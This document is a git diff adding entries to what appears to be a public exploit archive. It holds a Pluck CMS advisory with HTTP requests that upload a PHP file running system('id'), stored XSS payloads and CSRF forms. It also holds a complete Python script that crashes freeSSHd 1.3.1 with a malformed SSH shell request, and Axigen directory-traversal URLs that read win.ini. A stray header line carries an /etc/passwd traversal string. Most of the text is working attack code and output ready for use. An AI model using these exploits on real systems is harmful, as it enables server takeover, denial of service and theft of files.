+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="../../../../../../etc/passwd" lang="../../../../../../etc/passwd">
+<head>
+(...)
+
+
+
+2/ Code Execution
+
+By default .php extenions shall be amended to .txt, but it is able to upload code simply by using other extension like php5.
+
+#1 - Request:
+POST /pluck/admin.php?action=files HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=files
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------155797884312716218971623852778
+Content-Length: 376
+
+-----------------------------155797884312716218971623852778
+Content-Disposition: form-data; name="filefile"; filename="phpinfo.php5"
+Content-Type: application/x-php
+
+<?php
+system('id');
+?>
+
+-----------------------------155797884312716218971623852778
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------155797884312716218971623852778--
+
+
+#1 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 20:41:43 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 9947
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+(...)
+
+
+#2 - Request:
+GET /pluck/files/phpinfo.php5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=files
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+
+#2 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 20:41:44 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Vary: Accept-Encoding
+Content-Length: 54
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+
+
+3/ STORED XSS
+
+ a) image upload
+ 
+XSS is possible via file name.
+
+Request:
+POST /pluck/admin.php?action=images HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=images
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------3184135121063067737320373181
+Content-Length: 5013
+
+-----------------------------3184135121063067737320373181
+Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(1337)>.png"
+Content-Type: image/png
+
+(...)
+
+-----------------------------3184135121063067737320373181
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------3184135121063067737320373181--
+
+Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 20:43:19 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 9125
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+(...)
+				<div class="menudiv">
+					<strong>Name:</strong> <img src=# onerror=alert(1337)>.png					<br />
+					<strong>Size:</strong> 4653 bytes					<br />
+					<strong>Type:</strong> image/png					<br />
+					<strong>Upload successful!</strong>
+				</div>
+(...)
+
+
+ b) page
+ 
+XSS is possible when changing request, value of POST 'content' will be encoded by default.
+
+#1 - Request:
+POST /pluck/admin.php?action=editpage HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=editpage
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 127
+
+title=hello12&seo_name=&content=<script>alert(1337)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=Save
+
+#1 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 21:11:43 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 7337
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+
+#2 - Request:
+GET /pluck/?file=hello12 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/?file=hello
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+
+#2 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 21:11:51 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 1289
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+(...)
+		<div class="submenu">
+						</div>
+		<div class="kop">hello12</div>
+		<div class="txt">
+			<script>alert(1337)</script>					</div>
+		<div style="clear: both;"> </div>
+		<div class="footer">
+(...)
+
+
+
+
+4/ CSRF
+
+Since there is no protection at all, it is able to trigger many actions via cross site request forgery.
+
+<html>
+  <!-- Change site settings -->
+  <body>
+    <form action="http://localhost/pluck/admin.php?action=settings" method="POST">
+      <input type="hidden" name="cont1" value="pwn" />
+      <input type="hidden" name="cont2" value="usr&#64;mail&#46;box" />
+      <input type="hidden" name="save" value="Save" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+<html>
+  <!-- File upload -->
+  <body>
+    <script>
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/pluck/admin.php?action=files", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------155797884312716218971623852778");
+        xhr.withCredentials = true;
+        var body = "-----------------------------155797884312716218971623852778\r\n" + 
+          "Content-Disposition: form-data; name=\"filefile\"; filename=\"phpinfo.php5\"\r\n" + 
+          "Content-Type: application/x-php\r\n" + 
+          "\r\n" + 
+          "\x3c?php\r\n" + 
+          "system(\'id\');\r\n" + 
+          "?\x3e\r\n" + 
+          "\r\n" + 
+          "-----------------------------155797884312716218971623852778\r\n" + 
+          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
+          "\r\n" + 
+          "Upload\r\n" + 
+          "-----------------------------155797884312716218971623852778--";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+  </body>
+</html>
diff --git a/platforms/windows/dos/38001.py b/platforms/windows/dos/38001.py
new file mode 100755
index 000000000..25c818bdf
--- /dev/null
+++ b/platforms/windows/dos/38001.py
@@ -0,0 +1,515 @@
+'''
+# Exploit title: freesshd 1.3.1 denial of service vulnerability
+# Date: 28-8-2015
+# Vendor homepage: http://www.freesshd.com
+# Software Link: http://www.freesshd.com/freeSSHd.exe
+# Version: 1.3.1
+# Author: 3unnym00n
+ 
+# Details:
+# ----------------------------------------------
+#           byte      SSH_MSG_CHANNEL_REQUEST
+#           uint32    recipient channel
+#           string    "shell"
+#           boolean   want reply
+
+# freeSSHd doesn't correctly handle channel shell request, when the "shell" length malformed can lead crashing
+ 
+# Tested On: win7, xp
+# operating steps: 
+    1. in the freeSSHd settings: add a user, named "root", password is "fuckinA"
+    2. restart the server to let the configuration take effect
+    3. modify the hostname in this py.
+    4. running the py, u will see the server crash
+    
+    
+# remark: u can also modify the user auth service request packet, to adjust different user, different password
+
+ 
+'''
+
+import socket
+import struct
+import os
+from StringIO import StringIO
+from hashlib import sha1
+from Crypto.Cipher import Blowfish, AES, DES3, ARC4
+from Crypto.Util import Counter
+from hmac import HMAC
+
+## suppose server accept our first dh kex: diffie-hellman-group14-sha1
+P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
+G = 2
+__sequence_number_out = 3
+
+zero_byte = chr(0)
+one_byte = chr(1)
+four_byte = chr(4)
+max_byte = chr(0xff)
+cr_byte = chr(13)
+linefeed_byte = chr(10)
+crlf = cr_byte + linefeed_byte
+
+class Message (object):
+    """
+    An SSH2 message is a stream of bytes that encodes some combination of
+    strings, integers, bools, and infinite-precision integers (known in Python
+    as longs).  This class builds or breaks down such a byte stream.
+
+    Normally you don't need to deal with anything this low-level, but it's
+    exposed for people implementing custom extensions, or features that
+    paramiko doesn't support yet.
+    """
+
+    big_int = long(0xff000000)
+
+    def __init__(self, content=None):
+        """
+        Create a new SSH2 message.
+
+        :param str content:
+            the byte stream to use as the message content (passed in only when
+            decomposing a message).
+        """
+        if content is not None:
+            self.packet = StringIO(content)
+        else:
+            self.packet = StringIO()
+
+    def __str__(self):
+        """
+        Return the byte stream content of this message, as a string/bytes obj.
+        """
+        return self.asbytes()
+
+    def __repr__(self):
+        """
+        Returns a string representation of this object, for debugging.
+        """
+        return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
+
+    def asbytes(self):
+        """
+        Return the byte stream content of this Message, as bytes.
+        """
+        return self.packet.getvalue()
+
+    
+    def add_bytes(self, b):
+        """
+        Write bytes to the stream, without any formatting.
+
+        :param str b: bytes to add
+        """
+        self.packet.write(b)
+        return self
+
+    def add_byte(self, b):
+        """
+        Write a single byte to the stream, without any formatting.
+
+        :param str b: byte to add
+        """
+        self.packet.write(b)
+        return self
+
+    def add_boolean(self, b):
+        """
+        Add a boolean value to the stream.
+
+        :param bool b: boolean value to add
+        """
+        if b:
+            self.packet.write(one_byte)
+        else:
+            self.packet.write(zero_byte)
+        return self
+
+    def add_size(self, n):
+        """
+        Add an integer to the stream.
+
+        :param int n: integer to add
+        """
+        self.packet.write(struct.pack('>I', n))
+        return self
+
+    def add_int(self, n):
+        """
+        Add an integer to the stream.
+
+        :param int n: integer to add
+        """
+        if n >= Message.big_int:
+            self.packet.write(max_byte)
+            self.add_string(deflate_long(n))
+        else:
+            self.packet.write(struct.pack('>I', n))
+        return self
+
+    def add_int(self, n):
+        """
+        Add an integer to the stream.
+
+        @param n: integer to add
+        @type n: int
+        """
+        if n >= Message.big_int:
+            self.packet.write(max_byte)
+            self.add_string(deflate_long(n))
+        else:
+            self.packet.write(struct.pack('>I', n))
+        return self
+
+    def add_int64(self, n):
+        """
+        Add a 64-bit int to the stream.
+
+        :param long n: long int to add
+        """
+        self.packet.write(struct.pack('>Q', n))
+        return self
+
+    def add_mpint(self, z):
+        """
+        Add a long int to the stream, encoded as an infinite-precision
+        integer.  This method only works on positive numbers.
+
+        :param long z: long int to add
+        """
+        self.add_string(deflate_long(z))
+        return self
+
+    def add_string(self, s):
+        """
+        Add a string to the stream.
+
+        :param str s: string to add
+        """
+        self.add_size(len(s))
+        self.packet.write(s)
+        return self
+
+    def add_list(self, l):
+        """
+        Add a list of strings to the stream.  They are encoded identically to
+        a single string of values separated by commas.  (Yes, really, that's
+        how SSH2 does it.)
+
+        :param list l: list of strings to add
+        """
+        self.add_string(','.join(l))
+        return self
+
+    def _add(self, i):
+        if type(i) is bool:
+            return self.add_boolean(i)
+        elif isinstance(i, int):
+            return self.add_int(i)
+        elif type(i) is list:
+            return self.add_list(i)
+        else:
+            return self.add_string(i)
+
+    def add(self, *seq):
+        """
+        Add a sequence of items to the stream.  The values are encoded based
+        on their type: str, int, bool, list, or long.
+
+        .. warning::
+            Longs are encoded non-deterministically.  Don't use this method.
+
+        :param seq: the sequence of items
+        """
+        for item in seq:
+            self._add(item)
+
+
+def deflate_long(n, add_sign_padding=True):
+    """turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
+    # after much testing, this algorithm was deemed to be the fastest
+    s = bytes()
+    n = long(n)
+    while (n != 0) and (n != -1):
+        s = struct.pack('>I', n & long(0xffffffff)) + s
+        n >>= 32
+    # strip off leading zeros, FFs
+    for i in enumerate(s):
+        if (n == 0) and (i[1] != chr(0)):
+            break
+        if (n == -1) and (i[1] != chr(0xff)):
+            break
+    else:
+        # degenerate case, n was either 0 or -1
+        i = (0,)
+        if n == 0:
+            s = chr(0)
+        else:
+            s = chr(0xff)
+    s = s[i[0]:]
+    if add_sign_padding:
+        if (n == 0) and (ord(s[0]) >= 0x80):
+            s = chr(0) + s
+        if (n == -1) and (ord(s[0]) < 0x80):
+            s = chr(0xff) + s
+    return s
+
+def inflate_long(s, always_positive=False):
+    """turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
+    out = long(0)
+    negative = 0
+    if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
+        negative = 1
+    if len(s) % 4:
+        filler = chr(0)
+        if negative:
+            filler = chr(0xff)
+        # never convert this to ``s +=`` because this is a string, not a number
+        # noinspection PyAugmentAssignment
+        s = filler * (4 - len(s) % 4) + s
+    for i in range(0, len(s), 4):
+        out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
+    if negative:
+        out -= (long(1) << (8 * len(s)))
+    return out
+
+def byte_mask(c, mask):
+    return chr(ord(c) & mask)
+
+
+
+
+def _compute_key(K, H, session_id, id, nbytes):
+    """id is 'A' - 'F' for the various keys used by ssh"""
+    m = Message()
+    m.add_mpint(K)
+    m.add_bytes(H)
+    m.add_byte(str(id))
+    m.add_bytes(session_id)
+    out = sofar = sha1(m.asbytes()).digest()
+    while len(out) < nbytes:
+        m = Message()
+        m.add_mpint(K)
+        m.add_bytes(H)
+        m.add_bytes(sofar)
+        digest = sha1(m.asbytes()).digest()
+        out += digest
+        sofar += digest
+    return out[:nbytes]
+
+
+def compute_hmac(key, message, digest_class):
+    return HMAC(key, message, digest_class).digest()
+
+
+def read_msg(sock, block_engine_in, block_size, mac_size):
+    header = sock.recv(block_size)
+    header = block_engine_in.decrypt(header)
+    packet_size = struct.unpack('>I', header[:4])[0]
+    leftover = header[4:]
+    buf = sock.recv(packet_size + mac_size - len(leftover))
+    packet = buf[:packet_size - len(leftover)]
+    post_packet = buf[packet_size - len(leftover):]
+    packet = block_engine_in.decrypt(packet)
+    packet = leftover + packet
+
+def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
+    global __sequence_number_out
+    out = block_engine_out.encrypt(raw_data)
+
+    payload = struct.pack('>I', __sequence_number_out) + raw_data
+    out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
+    sock.send(out)
+    __sequence_number_out += 1
+
+def exploit(hostname, port):
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((hostname, port))
+
+    ## send client banner
+    client_banner = 'SSH-2.0-SUCK\r\n'
+    sock.send(client_banner)
+    ## recv server banner
+    server_banner = ''
+    while True:
+        data = sock.recv(1)
+        if data == '\x0a':
+            break
+        server_banner += data
+
+    print 'server banner is: ', server_banner.__repr__()
+
+    ## do key exchange
+    ## send client algorithms
+    cookie = os.urandom(16)
+
+
+    client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
+    sock.send(client_kex)
+    client_kex_init = client_kex[5:-5]
+
+
+    ## recv server algorithms
+    server_kex = ''
+    str_pl = sock.recv(4)
+    pl = struct.unpack('>I', str_pl)[0]
+    tmp = sock.recv(pl)
+    padding_len = ord(tmp[0])
+    server_kex_init = tmp[1:-padding_len]
+
+    ## do dh kex
+    ## send client dh kex
+    x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
+    e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
+    client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
+    sock.send(client_dh_kex)
+
+    ## recv server dh kex
+    str_pl = sock.recv(4)
+    pl = struct.unpack('>I', str_pl)[0]
+    server_dh_kex = sock.recv(pl)
+
+    ## send client newkeys
+    client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
+    sock.send(client_newkeys)
+
+    ## recv server newkeys
+    str_pl = sock.recv(4)
+    pl = struct.unpack('>I', str_pl)[0]
+    server_new_keys = sock.recv(pl)
+
+
+    ## calc all we need ...
+    host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
+    # print host_key_len
+    host_key = server_dh_kex[6:6 + host_key_len]
+
+    f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
+    str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
+    dh_server_f = inflate_long(str_f)
+
+    sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 +  host_key_len + f_len])[0]
+    sig = server_dh_kex[14 +  host_key_len + f_len:14 +  host_key_len + f_len + sig_len]
+
+    K = pow(dh_server_f, x, P)
+    ## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
+    hm = Message()
+
+    hm.add(client_banner.rstrip(), server_banner.rstrip(),
+           client_kex_init, server_kex_init)
+
+    hm.add_string(host_key)
+    hm.add_mpint(e)
+    hm.add_mpint(dh_server_f)
+    hm.add_mpint(K)
+
+    H = sha1(hm.asbytes()).digest()
+
+    ## suppose server accept our first cypher: aes128-ctr, hmac-sha1
+    block_size = 16
+    key_size = 16
+    mac_size = 20
+
+    IV_out = _compute_key(K, H, H, 'A', block_size)
+    key_out = _compute_key(K, H, H, 'C', key_size)
+
+    block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
+    mac_engine_out = sha1
+    mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
+
+    IV_in = _compute_key(K, H, H, 'B', block_size)
+    key_in = _compute_key(K, H, H, 'D', key_size)
+    block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
+    mac_engine_in = sha1
+    mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
+
+    ## do user auth
+    ## send client service request (user auth)
+    client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+    ## encrypt the packet
+    send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
+
+
+    ## recv server service accept
+    read_msg(sock, block_engine_in, block_size, mac_size)
+
+    ## send client userauth request
+    client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
+    ## the user name length and username
+    client_userauth_request += '\x00\x00\x00\x04'
+    client_userauth_request += 'root'
+
+    ## service
+    client_userauth_request += '\x00\x00\x00\x0E'
+    client_userauth_request += 'ssh-connection'
+
+    ## password
+    client_userauth_request += '\x00\x00\x00\x08'
+    client_userauth_request += 'password'
+    client_userauth_request += '\x00'
+
+    ## plaintext password fuckinA
+    client_userauth_request += '\x00\x00\x00\x07'
+    client_userauth_request += 'fuckinA'
+
+    ## padding
+    client_userauth_request += '\x00'*8
+
+    ## encrypt the packet
+    print 'send client_userauth_request'
+    send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
+    # out = block_engine_out.encrypt(client_userauth_request)
+    # payload = struct.pack('>I', __sequence_number_out) + client_userauth_request
+    # out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
+    # sock.send(out)
+
+
+    ## recv server userauth success
+    print 'recv  server userauth success'
+    read_msg(sock, block_engine_in, block_size, mac_size)
+
+
+    ## begin send malformed data
+    ## send channel open
+    client_channel_open = '\x00\x00\x00\x2c\x13\x5a\x00\x00\x00\x07session\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x80\x00' + '\x00'*0x13
+
+
+    print 'send client_channel_open'
+    send_msg(sock, client_channel_open, block_engine_out, mac_engine_out, mac_key_out, mac_size)
+
+    ## recv channel open success
+    # print 'recv channel open success'
+    read_msg(sock, block_engine_in, block_size, mac_size)
+
+    ## send client channel request
+    client_channel_request = '\x00\x00\x00\x3c\x0d\x62\x00\x00\x00\x00\x00\x00\x00\x07pty-req\x01\x00\x00\x00\x05vt100\x00\x00\x00\x50\x00\x00\x00\x18' \
+                             '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00'*0x0d
+
+
+    print 'send client_channel_request'
+    send_msg(sock, client_channel_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
+
+    ## recv server pty success
+    # print 'recv server pty success'
+    read_msg(sock, block_engine_in, block_size, mac_size)
+
+
+    ## send client shell request
+    client_shell_request = '\x00\x00\x00\x1c\x0c\x62\x00\x00\x00\x00'
+    client_shell_request += '\x6a\x0b\xd8\xdashell'  # malformed
+    client_shell_request += '\x01'
+    client_shell_request += '\x00'*0x0c
+
+    print 'send client_shell_request'
+    send_msg(sock, client_shell_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
+    # print 'recv server shell success'
+    # read_msg(sock, block_engine_in, block_size, mac_size)
+
+
+
+if __name__ == '__main__':
+
+    hostname = '192.168.242.128'
+    port = 22
+    exploit(hostname, port)
diff --git a/platforms/windows/remote/37996.txt b/platforms/windows/remote/37996.txt
new file mode 100755
index 000000000..7274960c9
--- /dev/null
+++ b/platforms/windows/remote/37996.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56343/info
+
+Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks. 
+
+http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
+
+http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini 
\ No newline at end of file